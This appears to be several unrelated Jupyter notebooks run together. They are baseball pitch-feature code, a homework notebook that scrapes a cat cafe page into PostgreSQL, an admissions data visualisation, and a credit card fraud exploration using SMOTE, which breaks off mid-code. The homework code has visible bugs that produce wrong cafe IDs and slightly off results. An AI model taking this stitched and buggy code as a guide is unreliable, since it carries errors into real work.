make_game_batting_order(game_df) all_games.append(game_df) new_df = pd.concat(all_games).sort_values(by=['game_date', 'game_pk', 'at_bat_number', 'pitch_number']) print('# pitches in df after: ' + str(len(new_df))) return new_df def make_prev_ab_walk_basehit_run_and_homerun_features(pitcher_df): all_games = [] #iterate over each game for game in pitcher_df['game_pk'].unique(): #make subset df for that game game_df = pitcher_df[pitcher_df['game_pk'] == game].copy() #initialize columns to False: game_df['prev_ab_run_scored'] = False game_df['prev_ab_homerun'] = False game_df['prev_ab_walk'] = False game_df['prev_ab_basehit'] = False game_df['prev_ab_strikeout'] = False #this gets the at_bats = game_df['at_bat_number'].sort_values().unique() #initialize empty dicts run_scored = [] homeruns = [] walks = [] basehits = [] strikeouts = [] walks = ['walk', 'hit_by_pitch'] basehits = ['single', 'double', 'triple', 'home_run'] #starting w/ 2nd AB, iterate thru to the end of the at_bats: for ab in at_bats[2:]: #get the index for the last pitch of the prev AB prev_ab_last_pitch_index = game_df[game_df['at_bat_number'] == ab-1]['pitch_number'].index.max() #check if the last pitch resulted in a walk or hit by pitch: if game_df.loc[prev_ab_last_pitch_index]['events'] in walks: #if so, add an entry walks.append(ab) #check if last pitch gave up a basehit: elif game_df.loc[prev_ab_last_pitch_index]['events'] in basehits: basehits.append(ab) elif game_df.loc[prev_ab_last_pitch_index]['events'] == 'strikeout': strikeouts.append(ab) #to check if prev AB resulted in a run scoring: compare score before and after the AB prev_score = game_df[game_df['at_bat_number'] == ab-1]['bat_score'].values[0] current_score = game_df[game_df['at_bat_number'] == ab]['bat_score'].values[0] if current_score > prev_score: run_scored.append(ab) #check if last AB gave up a homerun: if game_df.loc[prev_ab_last_pitch_index]['events'] == 'home_run': homeruns.append(ab) #iterate over each at_bat, and add the features to the df where appropriate for ab in at_bats: idx = game_df[game_df['at_bat_number'] == ab].index if ab in walks: game_df.at[idx, 'prev_ab_walk'] = True elif ab in basehits: game_df.at[idx, 'prev_ab_basehit'] = True elif ab in strikeouts: game_df.at[idx, 'prev_ab_strikeout'] = True if ab in run_scored: game_df.at[idx, 'prev_ab_run_scored'] = True if ab in homeruns: game_df.at[idx, 'prev_ab_homerun'] = True all_games.append(game_df) return pd.concat(all_games).sort_values(by=['game_date', 'game_pk', 'pitch_count']) batter_cols = ['fastball_perc_faced','fastball_chase_perc','fastball_bip_swung_perc', 'fastball_taken_strike_perc', 'fastball_est_woba', 'fastball_babip', 'fastball_iso_value', 'breaking_perc_faced', 'breaking_chase_perc', 'breaking_bip_swung_perc', 'breaking_taken_strike_perc', 'breaking_est_woba', 'breaking_babip', 'breaking_iso_value', 'offspeed_perc_faced', 'offspeed_chase_perc', 'offspeed_bip_swung_perc', 'offspeed_taken_strike_perc', 'offspeed_est_woba', 'offspeed_babip', 'offspeed_iso_value', 'pitchout_perc_faced'] def fill_batting_nans(pitcher_df, batting_order_slot_map): df = pitcher_df.copy() for slot in df['batting_order_slot'].unique().tolist(): subset = df[df['batting_order_slot'] == slot].copy() df = df.drop(subset.index) for col in batter_cols: subset[col] = subset[col].fillna(batting_order_slot_map[slot][col]) df = pd.concat([df, subset]) print('finished w/ slot: ' + str(slot)) df = df.sort_values(by=['game_date', 'game_pk', 'pitch_count']) return df def add_pb_matchup_priors(pitcher_df, pitcher_df17, start_dates, end_dates): df = pd.concat([pitcher_df, pitcher_df17], sort=False) #initialize empty list to store dfs (concat them together later) df_list = [] #iterate over each period for i in range(len(start_dates)): #make the prior and current dfs: prior_df = df[df['game_date'] < start_dates[i]] current_df = df[(df['game_date'] >= start_dates[i]) & (df['game_date'] <= end_dates[i])] #get all the pitch_types this pitcher has thrown in the past: pitch_types = prior_df['pitch_cat'].unique().tolist() try: pitch_types.remove('PO') except: pass print(pitch_types) #get a list of the batters in the current_df current_batters = current_df['batter'].unique().tolist() batters_dict = {} current_df_list = [] for batter in current_batters: batter_df_list = [] #first use subset from prior df batter_subset = prior_df[prior_df['batter'] == batter].copy() #if pitcher has never faced this batter before: if batter_subset.empty: #get the left or right handedness of the batter stand = current_df[current_df['batter'] == batter]['stand'].values[0] #use overall prior tendencies vs left or right handed hitters overall, by_count = get_pitch_tendencies(prior_df[prior_df['stand'] == stand]) else: overall, by_count = get_pitch_tendencies(batter_subset) batters_dict[batter] = by_count #now use subset of current_df where batter=batter batter_subset = current_df[current_df['batter'] == batter].copy() #iterate over the different count_cat types: for count_cat in ['ahead', 'behind', 'neutral']: count_subset = batter_subset[batter_subset['count_cat'] == count_cat].copy() if count_subset.empty: continue else: for pitch in pitch_types: try: count_subset['PB_'+pitch] = batters_dict[batter][count_cat][pitch] * 100 except KeyError: count_subset['PB_'+pitch] = 0 current_df_list.append(count_subset) current_df = pd.concat(current_df_list, sort=False) df_list.append(current_df) new_df = pd.concat(df_list, sort=False).sort_values(by=['game_date', 'game_pk', 'pitch_count']) return new_df ###Output _____no_output_____
homework5/Homework_5.ipynb
###Markdown Homework 5This homework presents a sophisticated scenario in which you must design a SQL schema, insert data into it, and issue queries against it. The scenarioIn the year 20XX, I have won the lottery and decided to leave my programming days behind me in order to pursue my true calling as a [cat cafe](https://en.wikipedia.org/wiki/Cat_caf%C3%A9) tycoon. [This webpage](http://static.decontextualize.com/cats.html) lists the locations of my cat cafes and all the cats that are currently in residence at these cafes.I'm interested in doing more detailed analysis of my cat cafe holdings and the cats that are currently being cared for by my cafes. For this reason, I've hired *you* to convert this HTML page into a workable SQL database. (Why don't I just do it myself? Because I am far too busy hanging out with adorable cats in all of my beautiful, beautiful cat cafes.)Specifically, I want to know the answers to the following questions:* What's the name of the youngest cat at any location?* In which zip codes can I find a lilac-colored tabby?* What's the average weight of cats currently residing at any location (grouped by location)?* Which location has the most cats with tortoiseshell coats?Because I'm not paying you very much, and because I am a merciful person who has considerable experience in these matters, I've decided to *write the queries for you*. (See below.) Your job is just to scrape the data from the web page, create the appropriate tables in PostgreSQL, and insert the data into those tables.Before you continue, scroll down to "The Queries" below to examine the queries as I wrote them. Problem set 1: Scraping the dataYour first goal is to create two data structures, both lists of dictionaries: one for the list of locations and one for the list of cats. You'll get these from scraping two `` tags in the HTML: the first table has a class of `cafe-list`, the second has a class of `cat-list`.Before you do anything else, though, execute the following cell to import Beautiful Soup and create a BeautifulSoup object with the content of the web page: ###Code from bs4 import BeautifulSoup from urllib.request import urlopen html = urlopen("http://static.decontextualize.com/cats.html").read() document = BeautifulSoup(html, "html.parser") ###Output _____no_output_____ ###Markdown Let's tackle the list of cafes first. In the cell below, write some code that creates a list of dictionaries with information about each cafe, assigning it to the variable `cafe_list`. I've written some of the code for you; you just need to fill in the rest. The list should end up looking like this:```[{'name': 'Hang In There', 'zip': '11237'}, {'name': 'Independent Claws', 'zip': '11201'}, {'name': 'Paws and Play', 'zip': '11215'}, {'name': 'Tall Tails', 'zip': '11222'}, {'name': 'Cats Meow', 'zip': '11231'}]``` ###Code cafe_list = list() cafe_table = document.find('table', {'class': 'cafe-list'}) tbody = cafe_table.find('tbody') for tr_tag in tbody.find_all('tr'): # print(tr_tag) zip = tr_tag.find('td', {'class': 'zip'}) name = tr_tag.find('td', {'class': 'name'}) # print(name) cafe_dict = {'name': name.text, 'zip': zip.text} cafe_list.append(cafe_dict) #pass # replace "pass" with your code cafe_list ###Output _____no_output_____ ###Markdown Great! In the following cell, write some code that creates a list of cats from the `` tag on the page, storing them as a list of dictionaries in a variable called `cat_list`. Again, I've written a bit of the code for you. Expected output:```[{'birthdate': '2015-05-20', 'color': 'black', 'locations': ['Paws and Play', 'Independent Claws*'], 'name': 'Sylvester', 'pattern': 'colorpoint', 'weight': 10.46}, {'birthdate': '2000-01-03', 'color': 'cinnamon', 'locations': ['Independent Claws*'], 'name': 'Jasper', 'pattern': 'solid', 'weight': 8.06}, {'birthdate': '2006-02-27', 'color': 'brown', 'locations': ['Independent Claws*'], 'name': 'Luna', 'pattern': 'tortoiseshell', 'weight': 10.88},[...many records omitted for brevity...] {'birthdate': '1999-01-09', 'color': 'white', 'locations': ['Cats Meow*', 'Independent Claws', 'Tall Tails'], 'name': 'Lafayette', 'pattern': 'tortoiseshell', 'weight': 9.3}]```Note: Observe the data types of the values in each dictionary! Make sure to explicitly convert values retrieved from `.string` attributes of Beautiful Soup tag objects to `str`s using the `str()` function. ###Code cat_list = list() cat_table = document.find('table', {'class': 'cat-list'}) tbody = cat_table.find('tbody') for tr_tag in tbody.find_all('tr'): #print(tr_tag) birthdate = tr_tag.find('td', {'class': 'birthdate'}) if birthdate: birthdate = birthdate.text #if birthdate: # birthdate = birthdate. color = tr_tag.find('td', {'class':'color'}) if color: color = color.text location_ar = [] locations = tr_tag.find_all('td', {'class':'locations'}) for location in locations: location_ar.append(str(location.text)) pattern = tr_tag.find('td', {'class':'pattern'}) if pattern: pattern = str(pattern.text) weight = tr_tag.find('td', {'class':'weight'}) if weight: weight = weight.text name = tr_tag.find('td', {'class': 'name'}) if name: name = str(name.text) # print(name) cat_dict = {'birthdate': birthdate, 'color':color, 'pattern':pattern,'locations':location_ar, 'weight':weight,'name':name} cafe_list.append(cafe_dict) # print(tr_tag) # your code here cat_list.append(cat_dict) cat_list ###Output _____no_output_____ ###Markdown Problem set 2: Designing the schemaBefore you do anything else, use `psql` to create a new database for this homework assignment using the following command: CREATE DATABASE catcafes; In the following cell, connect to the database using `pg8000`. (You may need to provide additional arguments to the `.connect()` method, depending on the distribution of PostgreSQL you're using.) ###Code import pg8000 conn = pg8000.connect(database="catcafes") ###Output _____no_output_____ ###Markdown Here's a cell you can run if something goes wrong and you need to rollback the current query session: ###Code conn.rollback() ###Output _____no_output_____ ###Markdown In the cell below, you're going to create *three* tables, necessary to represent the data you scraped above. I've given the basic framework of the Python code and SQL statements to create these tables. I've given the entire `CREATE TABLE` statement for the `cafe` table, but for the other two, you'll need to supply the field names and the data types for each column. If you're unsure what to call the fields, or what fields should be in the tables, consult the queries in "The Queries" below. Hints:* Many of these fields will be `varchar`s. Don't worry too much about how many characters you need—it's okay just to eyeball it.* Feel free to use a `varchar` type to store the `birthdate` field. No need to dig too deep into PostgreSQL's date types for this particular homework assignment.* Cats and locations are in a *many-to-many* relationship. You'll need to create a linking table to represent this relationship. (That's why there's space for you to create *three* tables.)* The linking table will need a field to keep track of whether or not a particular cafe is the "current" cafe for a given cat. ###Code cursor = conn.cursor() #cursor.execute("""CREATE TABLE cafe (id serial,name varchar(40),zip varchar(5))""") #cursor.execute("""CREATE TABLE cat (birthdate varchar(20),color varchar(20),name varchar(20),pattern varchar(20),weight varchar(20),id serial)""") #cursor.execute("""CREATE TABLE cat_cafe (cafeid integer, catid integer)""") #conn.commit() cursor = conn.cursor() cursor.execute("""CREATE TABLE cafe (id serial,name varchar(40),zip varchar(5))""") conn.commit() cursor.execute("""CREATE TABLE cat (birthdate varchar(20),color varchar(20),name varchar(20),pattern varchar(20),weight float,id serial)""") conn.commit() conn.rollback() cursor.execute("""CREATE TABLE cat_cafe (cafeid integer, catid integer, active boolean)""") conn.commit() ###Output _____no_output_____ ###Markdown After executing the above cell, issuing a `\d` command in `psql` should yield something that looks like the following:``` List of relations Schema | Name | Type | Owner --------+-------------+----------+--------- public | cafe | table | allison public | cafe_id_seq | sequence | allison public | cat | table | allison public | cat_cafe | table | allison public | cat_id_seq | sequence | allison(5 rows)```If something doesn't look right, you can always use the `DROP TABLE` command to drop the tables and start again. (You can also issue a `DROP DATABASE catcafes` command to drop the database altogether.) Don't worry if it takes a few tries to get it right—happens to the best and most expert among us. You'll probably have to drop the database and start again from scratch several times while completing this homework.> Note: If you try to issue a `DROP TABLE` or `DROP DATABASE` command and `psql` seems to hang forever, it could be that PostgreSQL is waiting for current connections to close before proceeding with your command. To fix this, create a cell with the code `conn.close()` in your notebook and execute it. After the `DROP` commands have completed, make sure to run the cell containing the `pg8000.connect()` call again. Problem set 3: Inserting the dataIn the cell below, I've written the code to insert the cafes into the `cafe` table, using data from the `cafe_list` variable that we made earlier. If the code you wrote to create that table was correct, the following cell should execute without error or incident. Execute it before you continue. ###Code conn.rollback() cafe_name_id_map = {} for item in cafe_list: cursor.execute("INSERT INTO cafe (name, zip) VALUES (%s, %s) RETURNING id", [str(item['name']), str(item['zip'])]) #print(item) rowid = cursor.fetchone()[0] cafe_name_id_map[str(item['name'])] = rowid #print(rowid) # print(cafe_name_id_map[str(item['name'])]) conn.commit() ###Output _____no_output_____ ###Markdown Issuing `SELECT * FROM cafe` in the `psql` client should yield something that looks like this:``` id | name | zip ----+-------------------+------- 1 | Hang In There | 11237 2 | Independent Claws | 11201 3 | Paws and Play | 11215 4 | Tall Tails | 11222 5 | Cats Meow | 11231(5 rows)```(The `id` values may be different depending on how many times you've cleaned the table out with `DELETE`.)Note that the code in the cell above created a dictionary called `cafe_name_id_map`. What's in it? Let's see: ###Code cafe_name_id_map print(type(cafe_name_id_map)) ###Output <class 'dict'> ###Markdown The dictionary maps the *name of the cat cafe to its ID in the database*. You'll need these values later when you're adding records to the linking table (`cat_cafe`).Now the tricky part. (Yes, believe it or not, *this* is the tricky part. The other stuff has all been easy by comparison.) In the cell below, write the Python code to insert each cat's data from the `cat_list` variable (created in Problem Set 1) into the `cat` table. The code should *also* insert the relevant data into the `cat_cafe` table. Hints:* You'll need to get the `id` of each cat record using the `RETURNING` clause of the `INSERT` statement and the `.fetchone()` method of the cursor object.* How do you know whether or not the current location is the "active" location for a particular cat? The page itself contains some explanatory text that might be helpful here. You might need to use some string checking and manipulation functions in order to make this determination and transform the string as needed.* The linking table stores an ID only for both the cat and the cafe. Use the `cafe_name_id_map` dictionary to get the `id` of the cafes inserted earlier. ###Code #conn.rollback() #cursor.execute("SELECT 'Cats Meow' from cafe RETURNING id") #rowid = cursor.fetchone()[0] #print(rowid) print(cat_list) conn.rollback() cat_name_id_map = {} for cat in cat_list: #pass # replace pass with your code. it will be a LOT of code! cursor.execute("INSERT INTO cat(name, birthdate, weight, color, pattern) VALUES (%s, %s, %s, %s, %s) RETURNING id", [str(cat['name']), str(cat['birthdate']), str(cat['weight']), str(cat['color']), str(cat['pattern'])]) cat_rowid = cursor.fetchone()[0] import re # print(type(cat['location'])) # cat['locations'] = {} new_list = cat['locations'][0].split(",") # print(new_list) #print(cat['locations']) # print("After split", cat['locations']) for location in new_list: #print(type(location)) # print(location) match = re.search(r"\*$", location) # print(match) print(cat_rowid) location = location.strip("*") # print(location) location = location.strip() location_int = cafe_name_id_map.get(location) if match: print("INSERT INTO cat_cafe(" + str(location_int) + " " + str(cat_rowid)+ " True") cursor.execute("INSERT INTO cat_cafe(cafeid, catid, active) VALUES (%s, %s, %s)", [location_int, cat_rowid, True]) else: print("INSERT INTO cat_cafe(" + str(location_int) + " " + str(cat_rowid) + " False") cursor.execute("INSERT INTO cat_cafe(cafeid, catid, active) VALUES (%s, %s, %s)", [location_int, cat_rowid, False]) #cat_name_id_map[str(cat['name'])] = rowid #print(cat_name_id_map) #for cat in cat_name_id_map: conn.commit() ###Output 1 INSERT INTO cat_cafe(3 1 False 1 INSERT INTO cat_cafe(2 1 True 2 INSERT INTO cat_cafe(2 2 True 3 INSERT INTO cat_cafe(2 3 True 4 INSERT INTO cat_cafe(4 4 True 4 INSERT INTO cat_cafe(1 4 False 5 INSERT INTO cat_cafe(3 5 True 6 INSERT INTO cat_cafe(1 6 True 7 INSERT INTO cat_cafe(1 7 True 7 INSERT INTO cat_cafe(45 7 False 7 INSERT INTO cat_cafe(4 7 False 8 INSERT INTO cat_cafe(3 8 True 8 INSERT INTO cat_cafe(45 8 False 9 INSERT INTO cat_cafe(2 9 False 9 INSERT INTO cat_cafe(3 9 True 10 INSERT INTO cat_cafe(2 10 True 10 INSERT INTO cat_cafe(1 10 False 11 INSERT INTO cat_cafe(2 11 False 11 INSERT INTO cat_cafe(45 11 True 11 INSERT INTO cat_cafe(3 11 False 12 INSERT INTO cat_cafe(2 12 False 12 INSERT INTO cat_cafe(3 12 True 13 INSERT INTO cat_cafe(1 13 False 13 INSERT INTO cat_cafe(4 13 True 14 INSERT INTO cat_cafe(1 14 True 15 INSERT INTO cat_cafe(2 15 True 15 INSERT INTO cat_cafe(3 15 False 16 INSERT INTO cat_cafe(4 16 True 17 INSERT INTO cat_cafe(3 17 True 18 INSERT INTO cat_cafe(3 18 True 18 INSERT INTO cat_cafe(4 18 False 19 INSERT INTO cat_cafe(1 19 False 19 INSERT INTO cat_cafe(2 19 True 20 INSERT INTO cat_cafe(45 20 False 20 INSERT INTO cat_cafe(2 20 True 20 INSERT INTO cat_cafe(4 20 False 21 INSERT INTO cat_cafe(2 21 True 22 INSERT INTO cat_cafe(1 22 True 22 INSERT INTO cat_cafe(4 22 False 23 INSERT INTO cat_cafe(3 23 True 23 INSERT INTO cat_cafe(2 23 False 23 INSERT INTO cat_cafe(4 23 False 24 INSERT INTO cat_cafe(4 24 True 25 INSERT INTO cat_cafe(4 25 False 25 INSERT INTO cat_cafe(1 25 False 25 INSERT INTO cat_cafe(45 25 True 26 INSERT INTO cat_cafe(45 26 False 26 INSERT INTO cat_cafe(3 26 False 26 INSERT INTO cat_cafe(4 26 True 27 INSERT INTO cat_cafe(1 27 False 27 INSERT INTO cat_cafe(2 27 False 27 INSERT INTO cat_cafe(45 27 True 28 INSERT INTO cat_cafe(3 28 True 29 INSERT INTO cat_cafe(45 29 False 29 INSERT INTO cat_cafe(1 29 False 29 INSERT INTO cat_cafe(2 29 True 30 INSERT INTO cat_cafe(3 30 True 31 INSERT INTO cat_cafe(2 31 True 32 INSERT INTO cat_cafe(4 32 True 33 INSERT INTO cat_cafe(2 33 False 33 INSERT INTO cat_cafe(45 33 False 33 INSERT INTO cat_cafe(1 33 True 34 INSERT INTO cat_cafe(4 34 False 34 INSERT INTO cat_cafe(2 34 False 34 INSERT INTO cat_cafe(1 34 True 35 INSERT INTO cat_cafe(2 35 False 35 INSERT INTO cat_cafe(3 35 True 36 INSERT INTO cat_cafe(1 36 True 36 INSERT INTO cat_cafe(2 36 False 37 INSERT INTO cat_cafe(3 37 True 37 INSERT INTO cat_cafe(45 37 False 38 INSERT INTO cat_cafe(4 38 True 39 INSERT INTO cat_cafe(1 39 False 39 INSERT INTO cat_cafe(4 39 False 39 INSERT INTO cat_cafe(2 39 True 40 INSERT INTO cat_cafe(45 40 True 40 INSERT INTO cat_cafe(2 40 False 40 INSERT INTO cat_cafe(4 40 False ###Markdown Issuing a `SELECT * FROM cat LIMIT 10` in `psql` should yield something that looks like this:``` id | name | birthdate | weight | color | pattern ----+-----------+------------+--------+----------+--------------- 1 | Sylvester | 2015-05-20 | 10.46 | black | colorpoint 2 | Jasper | 2000-01-03 | 8.06 | cinnamon | solid 3 | Luna | 2006-02-27 | 10.88 | brown | tortoiseshell 4 | Georges | 2015-08-13 | 9.40 | white | tabby 5 | Millie | 2003-09-13 | 9.27 | red | bicolor 6 | Lisa | 2009-07-30 | 8.84 | cream | colorpoint 7 | Oscar | 2011-12-15 | 8.44 | cream | solid 8 | Scaredy | 2015-12-30 | 8.83 | lilac | tabby 9 | Charlotte | 2013-10-16 | 9.54 | blue | tabby 10 | Whiskers | 2011-02-07 | 9.47 | white | colorpoint(10 rows)```And a `SELECT * FROM cat_cafe LIMIT 10` in `psql` should look like this:``` cat_id | cafe_id | active --------+---------+-------- 1 | 3 | f 1 | 2 | t 2 | 2 | t 3 | 2 | t 4 | 4 | t 4 | 1 | f 5 | 3 | t 6 | 1 | t 7 | 1 | t 7 | 5 | f(10 rows)```Again, the exact values for the ID columns might be different, depending on how many times you've deleted and dropped the tables. The QueriesOkay. To verify your work, run the following queries and check their output. If you've correctly scraped the data and imported it into SQL, running the cells should produce exactly the expected output, as indicated. If not, then you performed one of the steps above incorrectly; check your work and try again. (Note: Don't modify these cells, just run them! This homework was about *scraping* and *inserting* data, not querying it.) What's the name of the youngest cat at any location?Expected output: `Scaredy` ###Code cursor.execute("SELECT max(birthdate) FROM cat") birthdate = cursor.fetchone()[0] cursor.execute("SELECT name FROM cat WHERE birthdate = %s", [birthdate]) print(cursor.fetchone()[0]) ###Output Scaredy ###Markdown In which zip codes can I find a lilac-colored tabby?Expected output: 11237, 11215 ###Code conn.rollback() cursor.execute("""SELECT DISTINCT(cafe.zip) FROM cat JOIN cat_cafe ON cat.id = cat_cafe.catid JOIN cafe ON cafe.id = cat_cafe.cafeid WHERE cat.color = 'lilac' AND cat.pattern = 'tabby' AND cat_cafe.active = true """) print(', '.join([x[0] for x in cursor.fetchall()])) ###Output 11237, 11215 ###Markdown What's the average weight of cats currently residing at all locations?Expected output:```Independent Claws: 9.33Paws and Play: 9.28Tall Tails: 9.82Hang In There: 9.25Cats Meow: 9.76``` ###Code conn.rollback() cursor.execute(""" SELECT cafe.name, avg(cat.weight) FROM cat JOIN cat_cafe ON cat.id = cat_cafe.catid JOIN cafe ON cafe.id = cat_cafe.cafeid WHERE cat_cafe.active = True GROUP BY cafe.name """) for rec in cursor.fetchall(): print(rec[0]+":", "%0.2f" % rec[1]) ###Output Hang In There: 9.25 Independent Claws: 9.33 Paws and Play: 9.28 Tall Tails: 9.82 Cats Meow: 9.75 ###Markdown Which location has the most cats with tortoiseshell coats?Expected output: `Independent Claws` ###Code conn.rollback() cursor.execute(""" SELECT cafe.name FROM cat JOIN cat_cafe ON cat.id = cat_cafe.catid JOIN cafe ON cafe.id = cat_cafe.cafeid WHERE cat_cafe.active = true AND cat.pattern = 'tortoiseshell' GROUP BY cafe.name ORDER BY count(cat.name) DESC LIMIT 1 """) print(cursor.fetchone()[0]) ###Output Independent Claws
Data_visualization_seaborn_matplotlin.ipynb
###Markdown ###Code import pandas as pd import numpy as np import matplotlib.pyplot as plt import seaborn as sns df = pd.read_csv('Admission_Predict_Ver1.1.csv') data = df df.head() sns.relplot(x='GRE Score', y='Chance of Admit ', hue='GRE Score',data=df); sns.relplot(x='GRE Score', y='Chance of Admit ', hue='CGPA', kind="line", data=df); def category(x): if x < 0.80: return 'less' else: return 'high' df['Chance'] = df['Chance of Admit '].apply(category) data = data.drop(columns=['Serial No.','Chance']) data sns.countplot(x='Chance', data=df, hue='University Rating') sns.heatmap(data) data.plot.box() df['University Rating'].unique() plt.pie(df['Chance of Admit '], autopct ='% 1.1f %%', shadow = True) ###Output _____no_output_____
credit-card-fraud-prediction-rf-smote.ipynb
###Markdown Welcome to my exploration of Credit Card fraud!In this kernel I will do some explorations trying to understand the fraud transaction patterns and them I will implement some models of machine learning.I will implement technique an technique called SMOTE, supervised models, supervised learning algorithms. Introduction to DatasetThe datasets contains transactions made by credit cards in September 2013 by european cardholders. This dataset presents transactions that occurred in two days, where we have 492 frauds out of 284,807 transactions. The dataset is highly unbalanced, the positive class (frauds) account for 0.172% of all transactions.It contains only numerical input variables which are the result of a PCA transformation. Unfortunately, due to confidentiality issues, we cannot provide the original features and more background information about the data. Features V1, V2, ... V28 are the principal components obtained with PCA, the only features which have not been transformed with PCA are 'Time' and 'Amount'. Feature 'Time' contains the seconds elapsed between each transaction and the first transaction in the dataset. The feature 'Amount' is the transaction Amount, this feature can be used for example-dependant cost-senstive learning. Feature 'Class' is the response variable and it takes value 1 in case of fraud and 0 otherwise.Given the class imbalance ratio, we recommend measuring the accuracy using the Area Under the Precision-Recall Curve (AUPRC). Confusion matrix accuracy is not meaningful for unbalanced classification.The dataset has been collected and analysed during a research collaboration of Worldline and the Machine Learning Group (http://mlg.ulb.ac.be) of ULB (Université Libre de Bruxelles) on big data mining and fraud detection. More details on current and past projects on related topics are available on http://mlg.ulb.ac.be/BruFence and http://mlg.ulb.ac.be/ARTML) Let's start importing the librarys and looking the data ###Code import pandas as pd #To hand with data import numpy as np #To math import seaborn as sns #to visualization import matplotlib.pyplot as plt # to plot the graphs import matplotlib.gridspec as gridspec # to do the grid of plots #loading the data df_credit = pd.read_csv("C:/Users/Lenovo/Desktop/creditcard.csv") #looking the how data looks df_credit.head() #looking the type and searching for null values df_credit.info() # The data is stardarized, I will explore them later #For now I will look the "normal" columns df_credit[["Time","Amount","Class"]].describe() ###Output _____no_output_____ ###Markdown Firstly, I will explore through 3 different columns:- Time- Amount- Class ###Code #Lets start looking the difference by Normal and Fraud transactions print("Distribuition of Normal(0) and Frauds(1): ") print(df_credit["Class"].value_counts()) LABELS = ["Normal", "Fraud"] plt.figure(figsize=(7,5)) sns.countplot(df_credit['Class']) plt.xticks(range(2), LABELS) plt.title("Class Count", fontsize=18) plt.xlabel("Is fraud?", fontsize=15) plt.ylabel("Count", fontsize=15) plt.show() ###Output Distribuition of Normal(0) and Frauds(1): 0 284315 1 492 Name: Class, dtype: int64 ###Markdown We have a clearly imbalanced data.It's very common when treating of frauds... First I will do some explore through the Time and Amount. Second I will explore the V's Features, that are PCA's Time Features and some Feature EngineeringAs our Time feature are in seconds we will transform it ot minutes and hours to get a better understand of the patterns ###Code timedelta = pd.to_timedelta(df_credit['Time'], unit='s') df_credit['Time_min'] = (timedelta.dt.components.minutes).astype(int) df_credit['Time_hour'] = (timedelta.dt.components.hours).astype(int) #Exploring the distribuition by Class types throught hours and minutes plt.figure(figsize=(12,5)) sns.distplot(df_credit[df_credit['Class'] == 0]["Time_hour"], color='g') sns.distplot(df_credit[df_credit['Class'] == 1]["Time_hour"], color='r') plt.title('Fraud x Normal Transactions by Hours', fontsize=17) plt.xlim([-1,25]) plt.show() #Exploring the distribuition by Class types throught hours and minutes plt.figure(figsize=(12,5)) sns.distplot(df_credit[df_credit['Class'] == 0]["Time_min"], color='g') sns.distplot(df_credit[df_credit['Class'] == 1]["Time_min"], color='r') plt.title('Fraud x Normal Transactions by minutes', fontsize=17) plt.xlim([-1,61]) plt.show() ###Output _____no_output_____ ###Markdown - Interesting distribuition, but don't sounds like a clear pattern of action Looking the statistics of our Amount class frauds and normal transactions ###Code #To clearly the data of frauds and no frauds df_fraud = df_credit[df_credit['Class'] == 1] df_normal = df_credit[df_credit['Class'] == 0] print("Fraud transaction statistics") print(df_fraud["Amount"].describe()) print("\nNormal transaction statistics") print(df_normal["Amount"].describe()) df_fraud.shape df_normal.shape ###Output _____no_output_____ ###Markdown Interesting. Using this informations I will filter the values to look for Amount by Class I will filter the "normal" amounts by 3.000 ###Code #Feature engineering to a better visualization of the values df_credit['Amount_log'] = np.log(df_credit.Amount + 0.01) plt.figure(figsize=(14,6)) #I will explore the Amount by Class and see the distribuition of Amount transactions plt.subplot(121) ax = sns.boxplot(x ="Class",y="Amount", data=df_credit) ax.set_title("Class x Amount", fontsize=20) ax.set_xlabel("Is Fraud?", fontsize=16) ax.set_ylabel("Amount(US)", fontsize = 16) plt.subplot(122) ax1 = sns.boxplot(x ="Class",y="Amount_log", data=df_credit) ax1.set_title("Class x Amount", fontsize=20) ax1.set_xlabel("Is Fraud?", fontsize=16) ax1.set_ylabel("Amount(Log)", fontsize = 16) plt.subplots_adjust(hspace = 0.6, top = 0.8) plt.show() ###Output _____no_output_____ ###Markdown We can see a slightly difference in log amount of our two Classes. The IQR of fraudulent transactions are higher than normal transactions, but normal transactions have highest values Looking a scatter plot of the Time_min distribuition by Amount ###Code #Looking the Amount and time distribuition of FRAUD transactions ax = sns.lmplot(y="Amount", x="Time_min", fit_reg=False,aspect=1.8, data=df_credit, hue='Class') plt.title("Amounts by Minutes of Frauds and Normal Transactions",fontsize=16) plt.show() ###Output _____no_output_____ ###Markdown Looking a scatter plot of the Time_hour distribuition by Amount ###Code ax = sns.lmplot(y="Amount", x="Time_hour", fit_reg=False,aspect=1.8, data=df_credit, hue='Class') plt.title("Amounts by Hour of Frauds and Normal Transactions", fontsize=16) plt.show() ###Output _____no_output_____ ###Markdown I will use boxplot to search differents distribuitions: - We are searching for features that diverges from normal distribuition ###Code #Looking the V's features columns = df_credit.iloc[:,1:29].columns frauds = df_credit.Class == 1 normals = df_credit.Class == 0 grid = gridspec.GridSpec(14, 2) plt.figure(figsize=(15,20*4)) for n, col in enumerate(df_credit[columns]): ax = plt.subplot(grid[n]) sns.distplot(df_credit[col][frauds], bins = 50, color='g') #Will receive the "semi-salmon" violin sns.distplot(df_credit[col][normals], bins = 50, color='r') #Will receive the "ocean" color ax.set_ylabel('Density') ax.set_title(str(col)) ax.set_xlabel('') plt.show() ###Output _____no_output_____ ###Markdown We can see a interesting different distribuition in some of our features like V4, V9, V16, V17 and a lot more. Now let's take a look on time distribuition Feature selections ###Code #I will select the variables where fraud class have a interesting behavior and might can help us predict df_credit = df_credit[["Time_hour","Time_min","V2","V3","V4","V9","V10","V11","V12","V14","V16","V17","V18","V19","V27","Amount","Class"]] ###Output _____no_output_____ ###Markdown Some Feature Engineering ###Code df_credit.Amount = np.log(df_credit.Amount + 0.001) #Looking the final df df_credit.head() colormap = plt.cm.Greens plt.figure(figsize=(14,12)) sns.heatmap(df_credit.corr(),linewidths=0.1,vmax=1.0, square=True, cmap = colormap, linecolor='white', annot=True) plt.show() ###Output _____no_output_____ ###Markdown Preprocessing ###Code from imblearn.pipeline import make_pipeline as make_pipeline_imb # To do our transformation in a unique time from imblearn.over_sampling import SMOTE from sklearn.pipeline import make_pipeline from imblearn.metrics import classification_report_imbalanced from sklearn.model_selection import train_test_split from collections import Counter from sklearn.ensemble import RandomForestClassifier from sklearn.metrics import precision_score, recall_score, fbeta_score, confusion_matrix, precision_recall_curve, accuracy_score X = df_credit.drop(["Class"], axis=1).values #Setting the X to do the split y = df_credit["Class"].values # transforming the values in array # the function that we will use to better evaluate the model def print_results(headline, true_value, pred): print(headline) print("accuracy: {}".format(accuracy_score(true_value, pred))) print("precision: {}".format(precision_score(true_value, pred))) print("recall: {}".format(recall_score(true_value, pred))) print("f2: {}".format(fbeta_score(true_value, pred, beta=2))) # splitting data into training and test set X_train, X_test, y_train, y_test = train_test_split(X, y, random_state=2, test_size=0.20) classifier = RandomForestClassifier # build model with SMOTE imblearn 